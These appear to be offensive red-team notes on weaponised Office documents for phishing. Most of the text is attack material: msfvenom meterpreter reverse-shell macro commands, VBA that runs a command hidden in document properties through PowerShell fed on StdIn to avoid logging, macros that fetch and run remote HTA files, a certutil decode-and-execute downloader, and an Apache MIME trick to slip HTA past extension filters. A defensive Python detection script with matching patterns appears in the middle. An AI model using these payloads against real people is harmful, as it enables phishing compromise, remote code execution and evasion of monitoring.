Paste the output of the first portion of the payload script into the editor, save it.
Paste the remainder of the script into the word document itself. This is when you would perform the client-side attack by emailing this Word document to someone.
#Msfvenom
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PN> -e x86/shikata_ga_nai -f vba-exe
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread
#Other formats:
-f vba-psh or -f vba (these formats produce a single macro, so the two-part paste described below is not needed)
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
1] Create a .DOTM template document containing the macros
2] Create a .DOCX file from the Word default templates -> Rename as .zip -> Extract the .zip -> Modify word\_rels\settings.xml.rels
3] Save the file → Select all unzipped files and zip them → Change the extension back to .docx
4] Execution
Opening the document creates 4 HTTP requests.
Even if the user never enables content, you can see that the doc was opened → good for metrics
Hidden in File Properties - Stdin to Avoid Logging
The command resides in the "Author" property / a custom Excel form / an encoded form.
Hides PS commands from command-line logging by passing them to PowerShell via StdIn.WriteLine instead of as arguments.
Triggered from a button.
Leverages unused code for obfuscation.
Public Sub PrintDocumentProperties()
Dim oApp As New Excel.Application
Dim oWB As Workbook
Set oWB = ActiveWorkbook
Dim Exec As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
Dim author As String
' The command to run is read from the document's "Author" property
author = oWB.BuiltinDocumentProperties("Author")
' oApp, Exec, rwxpage, res, objWshell and c are never used: unused code left in as obfuscation
Set objWshell = VBA.CreateObject("WScript.Shell")
Dim c As String
Const quote As String = """"
c = "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"
c = c + "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"
Dim objWshell1 As Object
Set objWshell1 = CreateObject("WScript.Shell")
' "-Command -" makes PowerShell read the script from StdIn, so the command text never appears on the process command line
With objWshell1.Exec("powershell.exe -nop -windowstyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub
ActiveX Control for Macro Execution
The idea is to move away from the traditionally used AutoOpen() and Document_Open(), which are noisy.
Macro > contains RTF > contains a signed binary + DLL as OLE objects
Combines RTF's default behaviour of dropping OLE objects to the TEMP folder with a DLL-hijacking vulnerability in a trusted Kaspersky executable and a custom-made MSF loader.
HTA runs are cached in %localappdata%\Microsoft\Windows\INetCache\IE - important for cleanup
#https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1
#From Macro execute HTA
Sub HelloWorld()
PID = Shell("mshta.exe https://192.168.125.1/Update.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
-------
#Download and execute Base64-encoded payload.
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "encoded.crt", 2 '//overwrite
End With
Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")
End Sub
The user may save the file instead of opening it → because the file type has been changed, the default application will no longer be mshta. Use this option only if the client's proxy blocks HTA files.
If the victim opens the file directly instead of saving it, it will still execute via mshta.exe.
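Every variant on this page ends the same way: an Office process spawns mshta.exe, powershell.exe (with "-Command -" so the script arrives on StdIn), or cmd.exe running certutil -decode. The process-creation lineage is therefore the common detection point. The following is an added example, not part of the original notes: a small triage function run over constructed Sysmon-style process events (the field names mirror Sysmon Event ID 1, the event values are made up for this demo, and the process lists and patterns are assumptions for illustration).

```python
"""Process-lineage triage for Office-spawned script hosts.

Events are constructed dicts shaped like Sysmon Event ID 1 fields.
Rules (assumed for this example):
  office-spawn      Office parent -> script host / LOLBin child
  ps-stdin-command  powershell launched with "-Command -" (script via StdIn)
  certutil-decode   certutil used to decode a dropped payload
  mshta-remote      mshta.exe handed a URL
"""
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "certutil.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe"}

# Constructed sample events; the command lines on the notes page reappear here.
SAMPLE_EVENTS = [
    {"ProcessId": 4012, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -windowstyle hidden -Command -"},
    {"ProcessId": 4100, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://192.168.125.1/Update.hta"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -decode encoded.crt encoded.hta"},
    {"ProcessId": 3900, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\demo\\report.docx"'},
    {"ProcessId": 4250, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, so image paths compare by name."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list[str]:
    """Return the rule tags that fire for a single process-creation event."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event["CommandLine"]
    reasons = []
    if parent in OFFICE and child in SCRIPT_HOSTS:
        reasons.append(f"office-spawn:{parent}->{child}")
    # "-Command -" hides the script from 4688/Sysmon 1 command-line fields;
    # the launch pattern itself is still visible and rare in normal use.
    if child in ("powershell.exe", "pwsh.exe") and re.search(r"-command\s+-\s*$", cmd, re.I):
        reasons.append("ps-stdin-command")
    if child == "certutil.exe" and re.search(r"-decode\b", cmd, re.I):
        reasons.append("certutil-decode")
    if child == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        reasons.append("mshta-remote")
    return reasons


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> fired rules, for events that fired at least one."""
    return {e["ProcessId"]: r for e in events if (r := triage(e))}


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The StdIn trick defeats command-line fields only: with PowerShell Script Block Logging (Event ID 4104) enabled, the script text delivered on StdIn is still recorded, so pair this lineage rule with 4104 collection rather than relying on 4688 alone.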
Change mime type within Apache and bypass a filter based on the file extension. [Eg: hta.docx]
nano /etc/apache2/apache2.conf
#Browse to the "/var/www/" <Directory> block and change "AllowOverride" from "None" to "All"
service apache2 restart
#You can now leverage .htaccess files to change an extension's MIME type
#Create a .htaccess file in the root web directory and insert:
AddType application/hta docx
#This specifies that the .docx file extension should be served as an HTA application. Once .htaccess is saved, the change is immediate.
The Windows Script Host is implemented in cscript.exe and wscript.exe and is responsible for executing a wide variety of scripts such as .js, .vbs and .vbe.
JScript
JavaScript on Windows means JScript: Microsoft's implementation of ECMAScript. Like VBScript, JScript can be executed by standalone engines on Windows or by the engines implemented in IE or Edge.